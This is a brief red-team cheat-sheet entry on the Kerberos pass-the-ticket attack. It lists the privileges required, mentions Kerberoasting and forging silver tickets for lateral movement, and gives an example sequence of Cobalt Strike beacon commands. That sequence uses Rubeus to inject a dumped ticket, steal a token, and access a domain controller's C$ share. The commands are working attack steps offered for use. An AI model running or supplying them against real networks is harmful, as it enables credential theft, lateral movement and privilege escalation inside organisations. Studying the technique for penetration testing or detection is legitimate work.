The pass-the-ticket attack uses an intercepted or dumped Kerberos service ticket to authenticate against a service.
Requirements
- Admin privileges/credentials
- Dumping a service ticket does not require admin privilege. However, dumping a TGT does.
- Connection to SMB Admin$ share
The attacker can reuse the ticket elsewhere if possible, or crack the password (Kerberoasting) and use kerberos::golden to create a silver ticket for lateral movement & privilege escalation on the remote machine.
Example
Example with Cobalt Strike beacon & Rubeus:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
beacon> steal_token $pid # process must be under the target (i.e. ticket's) username
beacon> ls \\DC1\c$ # do stuff with ticket/token